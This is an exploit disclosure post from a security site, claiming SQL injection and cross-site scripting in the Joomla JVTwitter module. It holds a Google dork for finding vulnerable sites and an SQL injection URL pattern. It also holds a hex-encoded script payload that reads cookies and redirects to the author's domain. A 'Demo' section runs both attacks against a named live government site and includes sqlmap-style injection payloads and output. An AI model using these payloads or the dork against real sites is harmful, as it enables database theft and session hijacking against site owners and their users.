Joomla JVTwitter - SQL Injection & XSS Vulnerabilities

2020.11.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

############################################################# # Exploit Title: Joomla JVTwitter - SQL Injection & XSS Vulnerabilities # Google Dork: inurl:mod_jvtwitter/jvtwitter.php?id= # Date: 2020-11-07 # Exploit Author: Gh05t666nero # Team: IndoGhostSec # Vendor: joomlavi.com # Software Version: * # Software Link: https://joomlavi.com/documentation/joomla-extensions/jv-twitter.html # Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT CST 2020 aarch64 Android ############################################################# [*] Vuln Info: ============== SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code into a web page. Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams. ############################################################# [*] Exploit: ============ /modules/mod_jvtwitter/jvtwitter.php?id=[Number][SQL-I] /modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E ############################################################# [*] Demo: ========= https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=110 --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=110 AND 6499=6499-- xBNX Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=110 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x7178707171,(SELECT (ELT(7924=7924,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Anel --- [08:01:02] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E ############################################################# [*] Contact: ============ # Website: www.anonsec.my.id # Telegram: t.me/Gh05t666nero # Instagram: instagram.com/ojan_cxs # Twitter: twitter.com/Gh05t666nero1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top